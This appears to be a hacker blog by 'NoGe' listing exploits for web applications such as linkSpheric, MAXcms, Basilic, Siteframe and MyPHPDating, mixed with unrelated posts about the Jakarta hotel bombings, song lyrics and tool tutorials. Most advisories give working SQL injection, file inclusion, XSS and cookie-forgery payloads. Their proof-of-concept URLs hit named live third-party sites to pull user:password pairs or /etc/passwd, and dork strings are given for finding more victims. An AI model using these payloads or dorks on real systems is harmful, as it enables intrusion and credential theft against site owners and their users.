NoGe.ZoNe

[o] linkSpheric 0.74 Beta 6 SQL Injection Vulnerability
Software : linkSpheric version 0.74 Beta 6
Vendor   : http://dataspheric.com/
Download : http://sourceforge.net/projects/linkspheric/
Author   : NoGe

[o] Vulnerable file
viewListing.php

[o] Exploit
http://localhost/[path]/viewListing.php?listID=[SQL]

[o] Proof of concept
http://dataspheric.com/directory/viewListing.php?listID=-52+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,group_concat(userName,0x3a,password),21,22,23,24,25,26,27,28+from+users--
http://pcmsite.net/links/viewListing.php?listID=-5+union+select+1,2,3,4,5,6,7,8,group_concat(userName,0x3a,password),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+users--

[o] Dork
"Powered by linkSpheric"

[o] MAXcms - Databay Content Management System 3.11.20b Multiple Remote File Inclusion Vulnerability
Software : MAXcms - Databay Content Management System version 3.11.20b
Vendor   : http://www.databay.de
Download : http://downloads.sourceforge.net/micro-cms/microcms.zip
Author   : NoGe

[o] Vulnerable file
is_projectPath parameter
includes/InstantSite/inc.is_root.php

GLOBALS[thCMS_root] parameter
classes/class.Tree.php
includes/inc.thcms_admin_mediamanager.php
modul/mod.rssreader.php

is_path parameter
classes/class.tasklist.php
classes/class.thcms.php
classes/class.thcms_content.php
classes/class.thcms_modul_parent.php
classes/class.thcms_page.php
classes/class.thcsm_user.php
includes/InstantSite/class.Tree.php

thCMS_root parameter
classes/class.thcms_modul.php
includes/inc.page_edit_tasklist.php
includes/inc.thcms_admin_overview_backup.php
includes/inc.thcms_edit_content.php
modul/class.thcms_modul_parent_xml.php
modul/mod.cmstranslator.php
modul/mod.download.php
modul/mod.faq.php
modul/mod.guestbook.php
modul/mod.html.php
modul/mod.menu.php
modul/mod.news.php
modul/mod.newsticker.php
modul/mod.rss.php
modul/mod.search.php
modul/mod.sendtofriend.php
modul/mod.sitemap.php
modul/mod.tagdoc.php
modul/mod.template.php
modul/mod.test.php
modul/mod.text.php
modul/mod.upload.php
modul/mod.users.php

[o] Exploit
http://localhost/[path]/includes/InstantSite/inc.is_root.php?is_projectPath=[evilc0de]
http://localhost/[path]/classes/class.Tree.php?GLOBALS[thCMS_root]=[evilc0de]
http://localhost/[path]/classes/class.thcsm_user.php?is_path=[evilc0de]
http://localhost/[path]/modul/mod.users.php?thCMS_root=[evilc0de]

sedikit tutorial tentang gimana bypass Mikrotik Router.

download videonya disini

thx to bob :)

[o] Ultrize TimeSheet 1.2.2 Remote File Inclusion Vulnerability
Software : Ultrize TimeSheet version 1.2.2
Vendor   : http://www.ultrize.com/
Download : http://www.ultrize.com/timesheet/download/timeSheet-20080505.zip
Author   : NoGe

[o] Vulnerable file
include($config['include_dir'].'timesheet.class.php');
include/timesheet.php

[o] Exploit
http://localhost/[path]/include/timesheet.php?config[include_dir]=[evilc0de]

[o] Now YOu Know eChiropractic Local File Inclusion Vulnerability
Software : Now YOu Know eChiropractic
Vendor   : http://www.echiropractic.net/ - http://www.nowyouknow.net/
Author   : NoGe

[o] Vulnerable file
index.php

[o] Exploit
http://localhost/[path]/index.php?file=[LFI]

[o] Proof of concept
http://www.nowyouknow.net/index.php?file=../../../../../../../../../../../../../../../etc/passwd
http://www.braile.net/index.php?file=../../../../../../../../../../../../../../../etc/passwd

[o] Dork
"Now You Know Inc"

[o] Notes
this is a private script. many targets are in one IP address.

[o] Basilic 1.5.13 SQL Injection Vulnerability
Software : Basilic version 1.5.13
Vendor   : http://artis.imag.fr/Software/Basilic/
Download : http://artis.imag.fr/Software/Basilic/basilic-1.5.13.tar.gz
Author   : NoGe


[o] Vulnerable file
index.php

[o] Exploit
http://localhost/[path]/index.php?idAuthor=[SQL]

[o] Proof of concept
http://secure.ntsg.umt.edu/publications/index.php?idAuthor=-31+union+select+1,version()--
http://www.iarc.uaf.edu/publications/index.php?idAuthor=-19+union+select+1,version()--

[o] Dork
"Powered by Basilic"

[o] e107 Plugin my_gallery 2.4.1 readfile() Local File Disclosure Exploit

see the exploit in link below
http://milw0rm.com/exploits/9235


[o] Dork

"e107_plugins/my_gallery"


./NoGe

[o] MiniCWB 2.3.0 Multiple Remote File Inclusion Vulnerability
Software     : MiniCWB version 2.3.0
Vendor       : http://www.grafxsoftware.com/
Download : http://www.grafxsoftware.com/login.php?action=form&url=download.php
Author      : NoGe

[o] Vulnerable file
include($LANG.".extra.php");
language/en.inc.php
language/hu.inc.php
language/no.inc.php
language/ro.inc.php
language/ru.inc.php

[o] Exploit
http://localhost/[path]/language/en.inc.php?LANG=[evilc0de]
http://localhost/[path]/language/hu.inc.php?LANG=[evilc0de]
http://localhost/[path]/language/no.inc.php?LANG=[evilc0de]
http://localhost/[path]/language/ro.inc.php?LANG=[evilc0de]
http://localhost/[path]/language/ru.inc.php?LANG=[evilc0de]

[o] Dork
"Powered by MiniCWB"

Bombs minutes apart ripped through two luxury hotels in Jakarta.
the blasts at the J.W. Marriott and Ritz-Carlton
hotels, located side-by-side in an upscale business district in the
capital, blew out windows and scattered debris and glass across the
street, kicking up a thick plume of smoke. Facades of both hotels were
reduced to twisted metal.



The Marriott, which was attacked in 2003 in a bombing blamed on
Southeast Asian terror network Jemaah Islamiyah,
was hit first, followed by the blast at the Ritz two minutes later. The
attacks came just two weeks after presidential vote expected to
re-elect incumbent Susilo Bambang Yudhoyono who has been
credited with stabilizing a nation previously wracked by militancy.



Local media reported that two people were killed in another explosion
in a car north Jakarta later Friday. Officials confirmed a blast but
said it did not appear to be related.



English football club Manchester United have cancelled their tour match
in Jakarta after bomb explosions in the Indonesian capital
Bombs exploded at the Jakarta Marriott and Ritz-Carlton, which was to
host the Manchester United squad for four days from Saturday evening.

The team was scheduled to play Indonesia Super League XI in an
exhibition match in Jakarta Monday. The match was a part of Manchester
United summer tour. They will arrive in Kuala Lumpur late Friday night
to play a tour match against Malaysian XI at the Bukit Jalil Stadium.

After Jakarta, they were scheduled to fly to Seoul Wednesday before
concluding their four-stop trip in Hangzhou, China, next weekend. But
now with the cancellation of Jakarta trip the tour is set for big
changes.

The Daily Telegraph reported that Manchester United officials reviewed
the team's security situation and have decided to cancel the trip to
Jakarta as a result of the terrorist attacks.

"Following the explosions in Jakarta, one of which at the hotel the
team were due to stay in, and based on advice received, the directors
have informed the Indonesia FA that the club can not fulfil the fixture
in Jakarta on the 2009 Asian Tour," United said in a statement.

[o] dB Masters Multimedia's Content Manager 4.5 SQL Injection Vulnerability
Software : dB Masters Multimedia's Content Manager version 4.5
Vendor   : http://www.dbmasters.net/
Author   : NoGe

[o] Vulnerable file
index.php

[o] Exploit
http://localhost/[path]/index.php?n=xx&id=[SQL]

[o] Proof of Concept
http://www.fosada.za.org/index.php?n=62&id=-57+union+select+1,version()--
http://www.colourmebeautiful.com.au/index.php?n=1&id=-1+union+select+1,version()--

[o] Dork
"Powered by dB Masters Multimedia's Content Manager"

[o] OnePound Shop 1.x Blind SQL Injection & Cross Site Scripting Vulnerability
Software : OnePound Shop version 1.x
Vendor   : http://www.onepound.cn/
Author   : NoGe

[o] Vulnerable file
productsview.php
categories.php

[o] Exploit
http://localhost/[path]/productsview.php?id=xx&proid=[SQL]
http://localhost/[path]/productsview.php?id=xx&proid=[XSS]
http://localhost/[path]/categories.php?pid=[XSS]

[o] Proof of Concept
http://www.tele-way.com/productsview.php?id=87&proid=129+and+substring(@@version,1,1)=5
http://www.tele-way.com/productsview.php?id=87&proid=129+and+substring(@@version,1,1)=4
http://www.tele-way.com/productsview.php?id=87&proid=[XSS]
http://tonysbridal.net/categories.php?pid=[XSS]
http://vendorhotspot.com/categories.php?pid=[XSS]

[o] Dork
"Powered by OnePound"

[x] what is Tamper Data?

Tamper Data is one of Mozilla Firefox addons.
that use to view and modify HTTP/HTTPS headers and post parameters.
trace and time http response/requests.
security test web applications by modifying POST parameters.
or we can use this addons to find Insecure Cookie Handling Vulnerability.


[x] how to get it?

open this link below.
https://addons.mozilla.org/en-US/firefox/addon/966
and click Add to Firefox. this will automaticlly installed on you Firefox
after install it you need to restart your browser.


[x] how to use it?

you can download the video tutorial here
there is an example how to use Tamper Data
to find Insecure Cookie Handling Vulnerability.
have fun and be safe!! :)




./NoGe

[o] Lombego System Blind SQL Injection Vulnerability
Software : Lombego System
Vendor   : http://www.lombego.de/
Author   : NoGe

[o] Vulnerable file
index.php

[o] Exploit
http://localhost/[path]/index.php?page_id=[SQL]
http://localhost/[path]/index.php?page_id=1 and substring(@@version,1,1)=4
http://localhost/[path]/index.php?page_id=1 and substring(@@version,1,1)=5

[o] Proof of Concept
https://sabreconference.wifa.uni-leipzig.de/frontend/index.php?page_id=566+and+substring(@@version,1,1)=4
https://sabreconference.wifa.uni-leipzig.de/frontend/index.php?page_id=566+and+substring(@@version,1,1)=5

[o] Dork
"powered by Lombego Systems"

[o] Notes
this is an private sript and some target are in one host.

is milw0rm offline now?
coz i read str0ke goodbye statement on milw0rm header.
here is the header.



submission are closed too.
u can see it in the milw0rm footer.



Connection to milw0rm.com (80) timed out.
so is milw0rm really closed and offline or just maintenance?

[o] Rapidsendit Clone 2.1 Insecure Cookie Handling Vulnerability
Software : Rapidsendit Clone version 2.1
Vendor   : http://www.rapidsendit.com/
Demo     : http://www.rapidsendit.com/script/demo.html
Author   : NoGe

[o] Vulnerable file
admin.php

[o] Exploit
http://localhost/[path]/admin.php
javascript:document.cookie="logged=[md5_password_hash]; path=/";

[o] Proof Of Concept
http://www.rapidsendit.com/script/demo/admin.php
replace url above with this javascript
javascript:document.cookie="logged=696d29e0940a4957748fe3fc9efd22a3; path=/";
696d29e0940a4957748fe3fc9efd22a3 = admin password

[o] Dork
"Powered By Rapidsendit Clone"

There Are Ways
To Get There
If You Care Enough
For The Living
Make A Little Space
Make A Better Place

Heal The World
Make It A Better Place
For You And For Me
And The Entire Human Race
There Are People Dying
If You Care Enough
For The Living
Make A Better Place
For You And For Me


"He Is The Greatest Artist On Earth"

Goodbye Jacko!! Rest In Peace...

we are what we are, so don’t tell us how to act – how to be – how to live.
we are what we are, forever live or die don’t tell us how to act – how to be – how to live
we are what we are from beginning to the end!

GDM Theme ServerIsDown Version 1.0
background 1600x1200

click the picture below to download ServerIsDown



enjoy!! ^^




./NoGe

[o] Siteframe CMS 3.2.x SQL Injection & phpinfo() Disclosure Vulnerability
Software : Siteframe CMS version 3.2.x
Vendor   : http://siteframe.org/
Download : http://sitefrane.org/downloads/
Author   : NoGe

[o] Description
Siteframe™ is a lightweight content-management system
designed for the rapid deployment of community-based websites.
With Siteframe, a group of users can share stories and photographs,
create blogs, send email to one another, and participate in group activities.
Siteframe enables this by providing web-based content management
so that anyone can create content without needing to learn HTML.

[o] Vulnerable file
document.php

[o] Exploit
http://localhost/[path]/document.php?id=[SQL]
http://localhost/[path]/phpinfo.php

[o] Proof of concept
http://digi-forum.com/frame/document.php?id=10+and+1=2+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a,user_email,user_passwd),11,12+from+users--
http://digi-forum.com/frame/phpinfo.php
http://myolympus.org/document.php?id=15570+and+1=2+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a,user_email,user_passwd),11,12+from+users--
http://myolympus.org/phpinfo.php

[o] Dork
"Powered by Siteframe"

[o] Notes
Upgrade Siteframe CMS from 3.2.x to 5.0.6 (lastest)

[o] MyPHPDating 1.0 SQL Injection Vulnerability
Software : MyPHPDating version 1.0
Vendor   : http://www.phponlinedatingsoftware.com/
Demo     : http://www.phponlinedatingsoftware.com/demo.htm
Author   : NoGe

[o] Description
MyPHPDating 1.0 is a full-featured version of our online dating / Matchmaking software.
It combines all the features of any standard online dating / Matchmaking website plus much more features,
that make your dating website very powerful and easy to use.

[o] Vulnerable file
page.php

[o] Exploit
http://localhost/[path]/page.php?page_id=[SQL]

[o] Proof Of Concept
http://thaigirllover.com/page.php?page_id=-1+union+select+1,2,3,concat(@@version,0x3c3e,database())--

[o] Dork
"Powered by MyPHPDating"

this is a video tutorial about how to using metasploit GUI on windows.
target still the same as linux version below and using RPC DCOM exploit.
hopefully you like it.. :)

download the video here



./NoGe